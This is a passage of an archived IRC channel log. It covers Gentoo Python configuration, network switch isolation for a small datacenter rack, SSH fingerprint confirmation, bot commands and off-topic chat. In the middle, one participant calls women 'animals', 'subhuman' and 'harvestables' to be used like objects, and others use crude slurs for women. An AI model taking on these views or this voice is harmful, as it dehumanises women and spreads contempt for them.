discussed. http://btcbase.org/log/2018-04-18#1801504 1801892;1524037548;a111;Logged on 2018-04-18 04:10 mircea_popescu: rittah, he holds firm if peculiar religious beliefs. 1801893;1524037593;danielpbarron;lol, i try to avoid spam by making it a pm.. 1801894;1524037616;kathearin;I was always told to avoid politics and religion 1801895;1524037632;kathearin;it seems to make more enemies than friends 1801896;1524037634;danielpbarron;you must hang out at bars 1801897;1524037658;kathearin;sometimes, do you? 1801898;1524037695;danielpbarron;ya, mostly for karaoke 1801899;1524037714;kathearin;AH, like the Asian style places? 1801900;1524037736;mircea_popescu;you know, that's a point. karaoke is huge in korea etc. 1801901;1524037756;mircea_popescu;oh btw kathearin, forgot to ask you what do you do. 1801902;1524037776;danielpbarron;i guess it originated there, but the places i go are mostly american. one was portugese 1801903;1524037786;kathearin;Bartender lol, funny since daniels comment to me 1801904;1524037801;mircea_popescu;lol 1801905;1524037814;danielpbarron;wait is mp the "bartender"? 1801906;1524037840;mircea_popescu;danielpbarron, you asked her if she hangs out in bars. "alllll the time!" 1801907;1524037871;danielpbarron;aha, nailed it. 1801908;1524037874;kathearin;Is there any problem with bars daniel? 1801909;1524037903;danielpbarron;i hear that same line all the time "don't talk about religion or politics" 1801910;1524037908;danielpbarron;kathearin, nope 1801911;1524037922;mircea_popescu;kathearin, do you get hit on a lot while working ? 1801912;1524037947;kathearin;Yea, but mostly by sloppy drunks 1801913;1524037961;kathearin;who I imagine would plug any hole 1801914;1524038011;mircea_popescu;i imagine. 1801915;1524038042;kathearin;Not exactly a discerning crowd lol 1801916;1524038050;mircea_popescu;one of the lulziest things in a bar, is sit by the bartender and watch dudes hit on her. 1801917;1524038193;mircea_popescu;!!up kanzure 1801918;1524038193;deedbot;kanzure voiced for 30 minutes. 1801919;1524038196;mircea_popescu;!!up kathearin 1801920;1524038197;deedbot;kathearin voiced for 30 minutes. 1801921;1524038216;kathearin;Its flattering, anyways 1801922;1524038552;*;mircea_popescu is off to bed. take it easy all! 1801923;1524038579;ckang;nn 1801924;1524040152;ckang;!!up clarissa1 1801925;1524040152;deedbot;clarissa1 voiced for 30 minutes. 1801926;1524040238;clarissa1;https://usercontent.irccloud-cdn.com/file/DAArLN02/image.jpg sorry so late mircea_popescu - it couldn't upload over cellular so had to find open wifi 1801927;1524041953;diana_coman;http://btcbase.org/log/2018-04-17#1801164 <- ack and connection confirmed 1801928;1524041953;a111;Logged on 2018-04-17 23:06 ascii_lander: ACHTUNG, mircea_popescu , diana_coman : http://p.bvulpes.com/pastes/7Xjpf/?raw=true 1801929;1524042150;diana_coman;!Q later tell ascii_lander fingerprint of server is not included; python is version 3.5.4, ugh 1801930;1524042150;lobbesbot;diana_coman: The operation succeeded. 1801931;1524050718;ascii_lander;http://btcbase.org/log/2018-04-18#1801929 << it is not currently known ( at least to ascii_lander ) how to produce a working gentoo box with portage from past 5y or so that doesnt have python3 on it physically at all. however eselect lets you set 2 as the default ( see https://wiki.gentoo.org/wiki/Python ) 1801932;1524050718;a111;Logged on 2018-04-18 09:02 diana_coman: !Q later tell ascii_lander fingerprint of server is not included; python is version 3.5.4, ugh 1801933;1524050718;lobbesbot;ascii_lander: Sent 10 hours and 2 minutes ago: ok. 1801934;1524050720;lobbesbot;ascii_lander: Sent 2 hours and 22 minutes ago: fingerprint of server is not included; python is version 3.5.4, ugh 1801935;1524050753;diana_coman;ah, kk 1801936;1524050764;ascii_lander;diana_coman: the ssh fp thing is serious oops tho, please give the signal and i reset the machine by hand in singleuser mode and grab the fp for you from the physical console 1801937;1524050791;ascii_lander;as soon as i get into the dc today 1801938;1524050811;ascii_lander;this is exactly the kind of thing i meant in 'ask asap for last-minute things' 1801939;1524050883;ascii_lander;re python, possibly trinque made progress re a depython3ificated portage? 1801940;1524050927;ascii_lander;( gentoo portage is not the only necessary proggy mired in python3ism. the 'lattice ice' thing , for instance, also ) 1801941;1524051182;ascii_lander;http://btcbase.org/log/2018-04-18#1801287 << seems like he generates'em with js fauxpgp. classic symptom. 1801942;1524051182;a111;Logged on 2018-04-18 02:49 trinque: both did this at import http://p.bvulpes.com/pastes/3Dg7v/?raw=true 1801943;1524051250;ascii_lander;http://btcbase.org/log/2018-04-18#1801317 << aaand i betcha this is because they're camwhores, and have nfi what is pgp or even that d00d generated a key for'em at all , and he gave the magicstring over voicechat with the camgurls 1801944;1524051250;a111;Logged on 2018-04-18 03:00 mircea_popescu: driscole, but you do realise you wrote 1d8914a not 1b8914a1 ? 1801945;1524051294;ascii_lander;the tits may be functional, but penny-ante scamchiseling is still imho loathesome. 1801946;1524051579;diana_coman;ascii_lander, ok; when do you estimate getting to dc? 1801947;1524051616;ascii_lander;diana_coman: about 2h from now 1801948;1524051625;diana_coman;k 1801949;1524051635;ascii_lander;i will reconnect from there 1801950;1524051690;ascii_lander;http://btcbase.org/log/2018-04-18#1801589 << the current switch does not give the ability to enforce ip assignment; this will require a ~substantially~ more expensive iron 1801951;1524051690;a111;Logged on 2018-04-18 05:12 ben_vulpes: mircea_popescu: i do not believe that we have that degree of control over the routing with the current switch, but i'll let asciilifeform/ascii_lander raise the objections 1801952;1524051779;ascii_lander;the only sensible policy is to proclaim, ahead of time, that any customer found monkeying with the lan , will be banished, with no refunds and no recourse; 1801953;1524051822;ascii_lander;and it would appear that douchebag has already proclaimed ~in advance~ his intention to engage in hooliganisms, and therefore it is not clear to me that we want his business 1801954;1524051890;ckang;can't you use tagged vlans and isolate that way ? 1801955;1524051946;ascii_lander;ckang: it is my current understanding that the existing gear does not support this; will have to check with BingoBoingo, who installed it and tends it 1801956;1524052017;ckang;you should atleast be able to do it by switchport and static routing ya 1801957;1524052036;ascii_lander;even with 'tag' isolation, a hooligan can still soak up bw on the outgoing pipe, flood the lan, and similar 1801958;1524052060;ckang;yea but thats easy enough to detect on the switch 1801959;1524052071;ascii_lander;( currently we do not use per-user bw caps -- everyone has access to the full pipe for if he needs to burst ) 1801960;1524052078;ckang;or implement QoS 1801961;1524052093;ckang;but ugh QoS 1801962;1524052111;ascii_lander;ckang: right , ugh, everything you mentioned is a SUBSTANTIAL growth in complexity 1801963;1524052144;ckang;yeah but im not sure how else you would do it, short of a virtual stack 1801964;1524052234;ckang; managed 1gbit switches with layer 3 arent too badly priced 1801965;1524052245;ascii_lander;ckang: we won't use cisco 1801966;1524052248;ckang;most consumer ones even that now 1801967;1524052259;ckang;even do that now* 1801968;1524052266;ckang;netgear? 1801969;1524052269;ascii_lander;nope 1801970;1524052274;ckang;vyos? 1801971;1524052303;ascii_lander;i'ma have to discuss the switch in detail with BingoBoingo 1801972;1524052319;ascii_lander;but my current understanding is that we do not yet have this . 1801973;1524052344;ckang;https://vyos.io/ 1801974;1524052371;ckang;its actually faster in some benchmarks (compared to pfsense) 1801975;1524052374;ascii_lander;http://btcbase.org/log/2018-04-18#1801594 << it was never my impression that we would do business outside of wot. ( can be any depth of wot, but imho to do business entirely outside of wot, is a sin ) 1801976;1524052374;a111;Logged on 2018-04-18 05:15 mircea_popescu: ben_vulpes, i dunno, in principle the idea was that pizarro also sells to the general public ; has this changed ? and if you want people to make specific representations, that's one thing, but ~vague~ representations ? 1801977;1524052407;ckang;yall building out the routers too? 1801978;1524052455;ascii_lander;ckang: on what physical router does 'vyos' run ? 1801979;1524052459;ckang;chassis full of 4x 1gbE intel wouldnt cost much at all and could handle switching and routing 1801980;1524052464;ckang;x86 :) 1801981;1524052470;ckang;64 etc 1801982;1524052478;ckang;its basically a highly modified debian 1801983;1524052488;ascii_lander;ckang: do you have any idea what a x86 chassis that can hold, e.g., 40 nics, costs ?? 1801984;1524052496;ckang;with a cisco like interface 1801985;1524052528;ascii_lander;do you understand that if it doesn't hold 40 nics, you have no isolation, only pretense ? 1801986;1524052544;ckang;well you would put 40 nics in 1 chassis, but quad port per NIC @ 35$ a card 1801987;1524052560;ckang;if you consider the cost being router/switch and avoiding cisco 1801988;1524052562;ckang;it may be worth it 1801989;1524052575;ckang;firewall too 1801990;1524052588;ascii_lander;and the bus of a single x86 box becomes a bottleneck 1801991;1524052595;ckang;oh obv go 64bit 1801992;1524052598;ascii_lander;and the fans of a fucking x86 box become a single point of failure 1801993;1524052608;ascii_lander;this is riotously stupid. 1801994;1524052636;ckang;what vendor is okay to go with? 1801995;1524052692;ascii_lander;afaik nobody other than cisco and juniper, neither of which i will deal with, sells this item as a prepackaged product. 1801996;1524052704;ascii_lander;so currently we do without. 1801997;1524052734;ascii_lander;rather than buying usg-piercable pretense. 1801998;1524052774;ascii_lander;'we do not have isolation' is more honest than 'we have cisco-powered isolation' 1801999;1524052826;ckang;yea im not like a vyos salesman or anything either, it just came to mind 1802000;1524052844;ckang;ppl build 10gbit switches with it pretty regularly 1802001;1524052900;ascii_lander;this being said, i am investigating the most economical way to cook up a switch with isolation : for the 'adult' rockchip cluster ( will hold N of'em, ps, switch , inside a 2U ) 1802002;1524052918;ascii_lander;but the currently-installed pilot plant , is on a conventional switch. 1802003;1524052956;ckang;ah yea if you already have a bunch of network gear it wouldnt make sense 1802004;1524053026;ascii_lander;ok i'ma get moving, diana_coman has been waiting. 1802005;1524056007;BingoBoingo;!Q later tell ascii_lander http://wotpaste.cascadianhacker.com/pastes/6e5Ey/?raw=true 1802006;1524056007;lobbesbot;BingoBoingo: The operation succeeded. 1802007;1524058774;phf;http://btcbase.org/log/2018-04-18#1801580 << an old british tv show, the prisoner. it's mildly influential, so bands like to sample dialogue from it 1802008;1524058774;a111;Logged on 2018-04-18 05:10 mircea_popescu: phf, was that an old iron maiden album ? 1802009;1524062653;mod6;mornin' TMSR~ 1802010;1524063083;ascii_lander;ohai mod6 1802011;1524063083;lobbesbot;ascii_lander: Sent 1 hour and 57 minutes ago: http://wotpaste.cascadianhacker.com/pastes/6e5Ey/?raw=true 1802012;1524063086;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-18#338352 << i've never done it on a live system, but setting PYTHON_TARGETS="python2_7" and PYTHON_SINGLE_TARGET="python2_7", and rebuilding @world, deep with newuse and then emerge -cav python_3 (or whatever the exact version atom is this week) makes for py3-free gentoo in my limited experience 1802013;1524063089;mimisbrunnr;Logged on 2018-04-18 11:18 ascii_lander: ( gentoo portage is not the only necessary proggy mired in python3ism. the 'lattice ice' thing , for instance, also ) 1802014;1524063095;ascii_lander;ACHTUNG diana_coman , mircea_popescu !! >> http://p.bvulpes.com/pastes/KeWB8/?raw=true << 1802015;1524063103;ben_vulpes;before doing aaaanything else 1802016;1524063119;ben_vulpes;now if portage kiesters a py3 somewhere i don't know about, well, i don't know about it 1802017;1524063121;ascii_lander;ben_vulpes: iirc portage insists on p3 somewhere 1802018;1524063129;ascii_lander;but i hope to be proven wrong about this 1802019;1524063140;ascii_lander;i'd like to be 100% rid of p3 on my boxen, if at all practical 1802020;1524063210;trinque;ascii_lander: tried PYTHON_TARGETS="python2_7" ? 1802021;1524063218;trinque;iirc it supports both 1802022;1524063224;ascii_lander;trinque: can't recall 1802023;1524063231;ascii_lander;trinque: will have to try this. 1802024;1524063241;ascii_lander;to date i've simply relied on eselect. 1802025;1524063261;*;trinque doesn't approve of this splintering of use flags into various vars, but they did it 1802026;1524063265;ben_vulpes;ascii_lander: do check out UY1 at your leisure, i believe it purged of py3 by this method 1802027;1524063276;trinque;for grub also, drivers, others 1802028;1524063368;ascii_lander;oh btw i should note, i did not end up having to use grub 1802029;1524063399;ascii_lander;box was delivered with lilo. 1802030;1524063425;ben_vulpes;recipe for that would be neat 1802031;1524063460;ascii_lander;ben_vulpes: it was a tarring up and untarring of dulap's gentoo, so not so usefully recipeable 1802032;1524063510;ben_vulpes;ah 1802033;1524063520;ascii_lander;blew half a day on the following nonsense : excluded 'root' from tar, and this resulted in not only /root , but also /etc/init.d/root being excluded, which is the service that runs at boot to remount / as rw 1802034;1524063535;ascii_lander;fought for hours with 'wtf does this box boot up with ro / ' 1802035;1524063646;*;ascii_lander bbl, buying cables, stickers, etc 1802036;1524063661;ben_vulpes;dun forget cigarettes for after 1802037;1524064037;phf;ascii is an americanized russian hacker, doesn't smoke. now neither do i, but i always feel like something's amiss unless server room is filled with a standing smoke cloud 1802038;1524064059;*;ben_vulpes bbl, morning rituals 1802039;1524064317;deedbot;http://thetarpit.org/posts/y04/06f-filantropica.html << The Tar Pit - Filantropica 1802040;1524068484;mircea_popescu;phf, terrible fucking habit, at that. 1802041;1524068958;mircea_popescu;!!pay clarissa1 0.02 1802042;1524068963;deedbot;Get your OTP: http://p.bvulpes.com/pastes/MZvbn/?raw=true 1802043;1524069018;mircea_popescu;http://btcbase.org/log/2018-04-18#1801939 << i really don't see the problem with it being there per se ; the select-2 mechanism seems sufficient imo. 1802044;1524069018;a111;Logged on 2018-04-18 11:28 ascii_lander: re python, possibly trinque made progress re a depython3ificated portage? 1802045;1524069068;mircea_popescu;http://btcbase.org/log/2018-04-18#1801943 << quite likely. 1802046;1524069068;a111;Logged on 2018-04-18 11:34 ascii_lander: http://btcbase.org/log/2018-04-18#1801317 << aaand i betcha this is because they're camwhores, and have nfi what is pgp or even that d00d generated a key for'em at all , and he gave the magicstring over voicechat with the camgurls 1802047;1524069175;mircea_popescu;http://btcbase.org/log/2018-04-18#1801945 << you'll have to explain to me the logic of this sometime. is there some expectation that all bipedals are human and made in the similitude of god or something ? animals are animals, whether superficially human or not, form does not trump structure. if they don't have the spark of humanity, which very much IS rsa key etc, then how's he remiss using them exactly as a chunk of wood, pi 1802048;1524069175;a111;Logged on 2018-04-18 11:34 ascii_lander: the tits may be functional, but penny-ante scamchiseling is still imho loathesome. 1802049;1524069175;mircea_popescu;ece of fruit or lab reagent ? 1802050;1524069218;mircea_popescu;they're there, he's harvesting them for a purpose. they will be forever harvested, for this purpose or some other purpose, because THAT IS WHAT THEY ARE. harvestables. 1802051;1524069291;mircea_popescu;and they are that by personal, wholly owned choice. nobody asked them, or told them, or "made them" act in the specific manner of their subhuman nature, whereby "1. if it's not comfortable ~to me~ i'm 'not interested' because 2. i expect there's enough of us animals around so that 3. under the pressure of our wilful ignorance the republic will be forced to change and adapt." 1802052;1524069363;mircea_popescu;now this IS loathsome, and i don't see any merit whatever in offering it any quarter. they find tmsr/eulora/trilema/thelog/whatever "too hard" ? that is ohohohohoh oh-so-fine. someone else, who isn't, will use them as things FOR tmsr/eulora/trilema/thelog/etc. because there's nothing ELSE other than an' besides tmsr/etc. 1802053;1524069541;mircea_popescu;how's http://btcbase.org/log/2018-04-12#1797210 or http://btcbase.org/log/2017-10-11#1724167 more earned than the http://btcbase.org/log-search?q=%22!!pay%22+%220.02%22 set ? to my eye the later seems infinitely more respectable than the former, because a) at least lively enough to be doing something and because b) the similarity between female whores doing bartending/prostitution and the "male" whores doing "computer science 1802054;1524069541;a111;Logged on 2018-04-12 16:30 mircea_popescu: !!pay zx2c4 1 1802055;1524069541;a111;Logged on 2017-10-11 20:43 BHopkins: I think I did it right: 12taDFRdimNTHx1xoUkUZWj3nrE4js6LM6 1802056;1524069541;mircea_popescu;" and "gifting their valuable crypto contributions to the world" could not have possibly escaped your notice. 1802057;1524069596;mircea_popescu;contrary to what the wankers tell themselves, there's exactly no difference, just, the loser girls of millenium 3 do the whole pot/ex/waitress/dancer schtick, whereas the loser boys of millenium 3 do the whole pot/ex/technology/computology schtick 1802058;1524069656;mircea_popescu;at least the girls are honest about how they're doing nothing and their life is going nowhere (and for the record, this is as close as an invariant as social science ever produced -- females are way the fuck less inclined to lie to themselves. or to you, for that matter, unless they actually don't like you. but males lie to you BECAUSE they like you, and to themselves, too.) 1802059;1524070514;mircea_popescu;http://btcbase.org/log/2018-04-18#1801950 << so the idea is that he's not supposed to log into the switch from his box and fuck with ips ? and there's no way to shut this down ? 1802060;1524070514;a111;Logged on 2018-04-18 11:41 ascii_lander: http://btcbase.org/log/2018-04-18#1801589 << the current switch does not give the ability to enforce ip assignment; this will require a ~substantially~ more expensive iron 1802061;1524070577;mircea_popescu;http://btcbase.org/log/2018-04-18#1801953 << if this is so, which doesn't meet my books, it nevertheless contradicts practice, where in fact dood's shown himself very willing to follow rules as long as they were explicitly stated. 1802062;1524070577;a111;Logged on 2018-04-18 11:43 ascii_lander: and it would appear that douchebag has already proclaimed ~in advance~ his intention to engage in hooliganisms, and therefore it is not clear to me that we want his business 1802063;1524070667;mircea_popescu;http://btcbase.org/log/2018-04-18#1801956 << i expect. if it's as terrible as to have utterly no way of enforcing any kind of priviledged downstream, "all boxes you connect to this will forever be able to admin it", then we'll have to make a tmsr switch fw ?! but really, even the cheapest nat router available for $15 from radio shack has the capacity to not permit random box plugged in to alter the settings. 1802064;1524070667;a111;Logged on 2018-04-18 11:46 ckang: you should atleast be able to do it by switchport and static routing ya 1802065;1524070720;mircea_popescu;http://btcbase.org/log/2018-04-18#1801957 << seems self-evident that'll just get one kicked. 1802066;1524070720;a111;Logged on 2018-04-18 11:47 ascii_lander: even with 'tag' isolation, a hooligan can still soak up bw on the outgoing pipe, flood the lan, and similar 1802067;1524070760;mircea_popescu;http://btcbase.org/log/2018-04-18#1801964 << have you been working dc too ? 1802068;1524070760;a111;Logged on 2018-04-18 11:50 ckang: managed 1gbit switches with layer 3 arent too badly priced 1802069;1524070873;trinque;yeah, I can vouch for douchebag having asked permission to test deedbot each time, and having committed to telling me what he found. 1802070;1524070882;trinque;don't see the problem with that. 1802071;1524070903;trinque;I'd have been happy if he found something, and fixed it 1802072;1524070919;trinque;(slut onslaught meanwhile found things, so good enough) 1802073;1524070927;mircea_popescu;moreover he seems extremely valuable, sadly in the "black sheep" sort of way, where he tends to collect first pass wrath. but this is because he actually finds unexpected edges, of the flavour of "unexpected" that really is "i dun wanna think about that", ie, "hey flying kid, don't use your wings" 1802074;1524070996;mircea_popescu;but, most generally -- eh fuck it, i'm putting it in the aphorisms. 1802075;1524071341;mircea_popescu;http://btcbase.org/log/2018-04-18#1801975 << not like he doesn't have ratings. 1802076;1524071341;a111;Logged on 2018-04-18 11:52 ascii_lander: http://btcbase.org/log/2018-04-18#1801594 << it was never my impression that we would do business outside of wot. ( can be any depth of wot, but imho to do business entirely outside of wot, is a sin ) 1802077;1524071342;trinque;http://btcbase.org/log/2018-04-16#1799748 << done 1802078;1524071342;a111;Logged on 2018-04-16 14:19 mircea_popescu: incidentally trinque : i figure http://trilema.com/2018/the-rivers-of-blood-article-or-the-lordship-list-fifth-year/ is ready for application. 1802079;1524071358;mircea_popescu;!!ratings deedbot 1802080;1524071359;deedbot;http://p.bvulpes.com/pastes/KaVso/?raw=true 1802081;1524071403;mircea_popescu;there we go. mazel tov ; and spyked ave1 lobbes permit me to congratulate you an' to wish you long&happy tenure. 1802082;1524071568;mircea_popescu;http://btcbase.org/log/2018-04-18#1801992 << have two at either side of the cabinet and route ambiguously through either. this is not even as bad a design as it strikes you, specifically because it can use "standard" parts. we can make a cuntoo vyos. 1802083;1524071568;a111;Logged on 2018-04-18 11:56 ascii_lander: and the fans of a fucking x86 box become a single point of failure 1802084;1524071600;mircea_popescu;and it'll be faster and cheaper to do that than to buy juniper, hang/fire/burn at the stake all ustards involved and have a fg-like line of products put out. 1802085;1524071635;mircea_popescu;moreover, s.nsa could VERY sensibly sell a prepackaged in this manner cuntoo-based vyos replacement. 1802086;1524071951;ben_vulpes;mircea_popescu: boxes can bind to whichever IPs they want, not a matter of getting into the router and changing settings there. 1802087;1524072009;mircea_popescu;then ? i don't have a good grasp of the problem here.\ 1802088;1524072054;ckang;most of the Ubiquiti routers use a form of VyOS (which is a forked version of vyatta) 1802089;1524072083;ben_vulpes;at the risk of enumerating badness and a code of conduct, i'm going to work up a set of things that self-evidently will get one kicked 1802090;1524072105;mircea_popescu;ben_vulpes, if it's self-evident why write it down then ? 1802091;1524072147;ben_vulpes;self evident to you, not me. 1802092;1524072160;mircea_popescu;your party. 1802093;1524072418;diana_coman;http://btcbase.org/log/2018-04-18#1802014 <- ack; fp matches so that's good 1802094;1524072418;a111;Logged on 2018-04-18 14:51 ascii_lander: ACHTUNG diana_coman , mircea_popescu !! >> http://p.bvulpes.com/pastes/KeWB8/?raw=true << 1802095;1524072447;ckang;ben_vulpes: changing an IP address wont matter much if they are zoned off in their own vlan and associated with a specific port. they simply wouldnt be able to reach their gateway after changing IPs, it cant circumvent the router/switch by doing just that anyways, not with proper ACLs in place 1802096;1524072454;mircea_popescu;http://btcbase.org/log/2018-04-18#1802033 << had you excluded "root/" instead of "root"... 1802097;1524072454;a111;Logged on 2018-04-18 14:58 ascii_lander: blew half a day on the following nonsense : excluded 'root' from tar, and this resulted in not only /root , but also /etc/init.d/root being excluded, which is the service that runs at boot to remount / as rw 1802098;1524072482;mircea_popescu;ckang, alright, it's time you tell us your life story. what did you do ? 1802099;1524072543;ckang;im not a DC guy by any means, i work more with the software/services side of things 1802100;1524072567;ckang;i just know enough to request what i need from our networking folks 1802101;1524072592;ckang;but i wouldnt trust myself making changes on a production switch by any means 1802102;1524072618;ckang;http://www.diva-portal.se/smash/get/diva2:849461/FULLTEXT01.pdf <-- sorry, pdf 1802103;1524072663;ckang;but its a research paper on pfsense vs vyos performance (from a university student) 1802104;1524072677;mircea_popescu;jesus this guy. why so shy, yo! 1802105;1524072731;ckang;but my life story isnt interesting by any means, not as much as others here anyway 1802106;1524072773;mircea_popescu;how would you know ? 1802107;1524072796;ckang;just going off what ive read 1802108;1524072803;mircea_popescu;trinque, in today;s nitpicks : http://wot.deedbot.org/D.html , grepping for douchebag produces a link to douchebag__ 's page. 1802109;1524072816;mircea_popescu;!!key douchebag 1802110;1524072817;deedbot;http://wot.deedbot.org/5A067BA31976B2576818247075CD5709D6509291.asc 1802111;1524072841;*;ckang is currently deploying esxi 6.7 and a vcenter appliance to see if its worth ditching 6.0 for 1802112;1524072857;mircea_popescu;the key is correct, yet http://wot.deedbot.org/5A067BA31976B2576818247075CD5709D6509291.html behaves unexpectedly by showing no lines 1802113;1524072886;trinque;hm weird. will look at it. 1802114;1524075674;lobbes;It is an honor to receive this privilege. I will continue to position my feet to support well-placed strikes to the Inca with the katana the Republic has helped me to sharpen >> http://btcbase.org/log/2018-04-18#1802081 1802115;1524075674;a111;Logged on 2018-04-18 17:10 mircea_popescu: there we go. mazel tov ; and spyked ave1 lobbes permit me to congratulate you an' to wish you long&happy tenure. 1802116;1524075687;lobbes;Ftr, yours already sounds more interesting than mine! >> http://btcbase.org/log/2018-04-18#1802081 1802117;1524075687;a111;Logged on 2018-04-18 17:10 mircea_popescu: there we go. mazel tov ; and spyked ave1 lobbes permit me to congratulate you an' to wish you long&happy tenure. 1802118;1524075699;lobbes;Oops wrong log line 1802119;1524075718;lobbes;http://btcbase.org/log/2018-04-18#1802105 1802120;1524075718;a111;Logged on 2018-04-18 17:32 ckang: but my life story isnt interesting by any means, not as much as others here anyway 1802121;1524075995;lobbes;Anyways, life story almost guaranteed to get more interesting sticking around these parts 1802122;1524077975;douchebag;hello all 1802123;1524077983;*;ascii_lander reporting live from the rack 1802124;1524077996;*;ascii_lander bought a 2nd GB switch at the orcshop, installed 1802125;1524078066;diana_coman;as far as I can tell the hardware including fgs seems to be as expected and working, hopefully all is fine 1802126;1524078099;ascii_lander;diana_coman: yay 1802127;1524078109;ascii_lander;btw the riddle of the power plugs, i solved 1802128;1524078113;diana_coman;log is full of port scanning but that's kind of expected anyway 1802129;1524078138;ascii_lander;( answ was: BingoBoingo was a n00b when plugged'em in, did not know that it wants 50pounds of force , they all hung loose ) 1802130;1524078165;diana_coman;the classic solution of "use a bigger hammer" 1802131;1524078174;ascii_lander;diana_coman: i dun think i ever had a box where the log were not eternally full of portscanola 1802132;1524078186;trinque;straight to the fail2ban 1802133;1524078190;ascii_lander;in other noose, i sorta tamed the dc cat 1802134;1524078191;*;diana_coman surprisingly...did 1802135;1524078199;ascii_lander;(photos later, promise) 1802136;1524078261;trinque;http://btcbase.org/log-search?q=from%3Aasciilifeform+bbl+meat << I assume it was the meat 1802137;1524078273;ascii_lander;lol 1802138;1524078304;ascii_lander;trinque: i used a little bag of animal 'candy' from local shop 1802139;1524078375;ben_vulpes;there is a cat?! 1802140;1524078384;ascii_lander;ben_vulpes: there is! 1802141;1524078396;ascii_lander;little fella, lives in the tower parking lot 1802142;1524078401;ben_vulpes;ah 1802143;1524078530;ascii_lander;http://btcbase.org/log/2018-04-18#1802047 << understand correctly, i dun give half a shit if he cleans the gurlz and eats'em. what i dun like is liars. why does the d00d have to pretend 'they are at my party'. 1802144;1524078530;a111;Logged on 2018-04-18 16:32 mircea_popescu: http://btcbase.org/log/2018-04-18#1801945 << you'll have to explain to me the logic of this sometime. is there some expectation that all bipedals are human and made in the similitude of god or something ? animals are animals, whether superficially human or not, form does not trump structure. if they don't have the spark of humanity, which very much IS rsa key etc, then how's he remiss using them exactly as a chunk of wood, pi 1802145;1524078561;mircea_popescu;ah, that. 1802146;1524078567;mircea_popescu;i dunno. kids. 1802147;1524078584;mircea_popescu;!!up LordMPofTMSR 1802148;1524078585;deedbot;LordMPofTMSR voiced for 30 minutes. 1802149;1524078623;mircea_popescu;in expectation of alf eating through the log, im taking a laptop down to the pool, get best of both worlds : wet sluts and stuffs! 1802150;1524078641;ascii_lander;lol 1802151;1524078665;ascii_lander;funny place, this here, massive beach, 28c, and... 0 swimmers 1802152;1524078673;ascii_lander;not today, not yesterday, not at all. nobody. swims. 1802153;1524078697;*;ascii_lander brb, leaving dc, going to BingoBoingo's place 1802154;1524078862;LordMPofTMSR;asciilifeform, about the same here, miles and miles of perfectly empty beach. not so much nudist bbeach as naturist, there's nobody fucking there except the fauna, and it dun care. 1802155;1524078884;LordMPofTMSR;aaand the wireless reaches quite this far apparently. win. 1802156;1524080509;douchebag;mircea_popescu: I have some girls who are possibly interested, are you around right now? 1802157;1524080575;ckang;!!up LordMPofTMSR 1802158;1524080575;deedbot;LordMPofTMSR voiced for 30 minutes. 1802159;1524080577;ckang;;p 1802160;1524080584;LordMPofTMSR;lol im down here/ 1802161;1524080593;LordMPofTMSR;but sure. 1802162;1524080849;douchebag;LordMPofTMSR: Can you verify your identity in any way? 1802163;1524080933;LordMPofTMSR;well if you read up in the log you can see i upped myself first. 1802164;1524080958;douchebag;Alright, you also said you're bringing the laptop down to the pool - so I guess that's good enough 1802165;1524080992;LordMPofTMSR;can never be too careful with these things! 1802166;1524081466;LordMPofTMSR;spyked, your filantropica review is terrible for failing to point out the ion susai - mihaita dragomirescu link, and general unawareness of the dramaz there. 1802167;1524081622;LordMPofTMSR;i thought you were from the shithole anyway, never encountered the item ? town's legendaria, exactly http://trilema.com/2012/tibi-nebunu-zorilor-represent/ sorta thing. 1802168;1524081695;*;ascii_lander waves 1802169;1524081721;*;ascii_lander reporting live from a very spiffy rooftop lounge thing 1802170;1524082080;ascii_lander;http://btcbase.org/log/2018-04-18#1802084 << the 'adult' form of rockchiptron ( what we installed presently, is a pilot plant ) will include, yes, a custom switch that properly isolates 1802171;1524082080;a111;Logged on 2018-04-18 17:13 mircea_popescu: and it'll be faster and cheaper to do that than to buy juniper, hang/fire/burn at the stake all ustards involved and have a fg-like line of products put out. 1802172;1524082091;ascii_lander;and if i gotta make it from scratch, then i will 1802173;1524082095;spyked;LordMPofTMSR, I had no idea. and looking for mihaita dragomirescu, all I found was news items a la http://archive.is/ojKnE and other cancans. if ye know for a fact this is not made-up scandal, then I believe, but otherwise... eh. 1802174;1524082131;ascii_lander;( idea being, picture a 2u chassis , from outside -- ordinary, inside -- double ps, proper switch, 32 rockchippen ) 1802175;1524082132;LordMPofTMSR;there factually was a creative busker hanging about piata romana, mid 90s. his self-stories are in fact lies, but the link is still there neh. 1802176;1524082168;LordMPofTMSR;ascii_lander, something like that, for the rockchips. however, what i was talking about is a 1 or i guess 2u general purpose drop-in replacement switch. 1802177;1524082176;spyked;thanks for the reference. will read up on it and find a way to add it to the review 1802178;1524082190;LordMPofTMSR;anyway, laptop kbd is bs. bbs on actua machine. 1802179;1524082191;ascii_lander;LordMPofTMSR: no reason why it cannot be used as general-purpose switchtron, once it exists 1802180;1524082388;ascii_lander;http://btcbase.org/log/2018-04-18#1802093 << absolute last chance to request any work that requires ascii_lander's hands personally in the rack : next coupla hrs 1802181;1524082388;a111;Logged on 2018-04-18 17:26 diana_coman: http://btcbase.org/log/2018-04-18#1802014 <- ack; fp matches so that's good 1802182;1524082400;ascii_lander;i blast off tomorrow at ~noon 1802183;1524082579;ascii_lander;( it is 17:22 here atm ) 1802184;1524082602;mircea_popescu;spyked, there was some dumb bitch whose name i forget "tryina make it in dis biznis" that fell for it and put him in studio for one of their inane talkshow as if genuine article. he certainly wasn't a "great director from braila" etc. however, he was in fact a) busking and b) coming up with lulzy shit, quite in the vein of "surisul fetei din tramvai". and the "you can't possibly know him" bit is asking for it -- i'd not have 1802185;1524082602;mircea_popescu;said anything otherwise, but caranfil or no caranfil -- wantsome, getsome! 1802186;1524082720;*;spyked was 'lil kid in the '90s anyway, didn't casually start exploring bucharest shithole until early 2000s. sure, heard stories of the usual ex-doctor/university professor bum/taxi driver and met a few weirdos, but otherwise neighbourhood consisted mostly of gypsies, while -- believe or not -- downtown filth was too varied to remember any specific face/case 1802187;1524082740;mircea_popescu;(for the rotakus : the bit in question is "surisul fetei din tramvai m-a fermecat definitiv. am inc-o drama la activ, exact ca domnul ion susai." in romanian it's actually notbad poetry, to my exacting standards that somehow manage to exclude most of it. not actually translatable, sadly, in the sense that it's too dependent on language for its substance, if you translate it there's nothing left. but anyway..) 1802188;1524082796;ascii_lander;ohlol neato 1802189;1524082802;mircea_popescu;spyked, the advantage of a leisured life started somewhat later, i guess. i certainly had all the time in the world to hang out in bars with all the "inteligentsia" until i heard most of the stories. 1802190;1524083082;spyked;the best story I have -- speaking of "interesting life stories" -- is that one of the "hired guards" ("paznic") at school, while a kid, was "first man accused of terrorism". bet 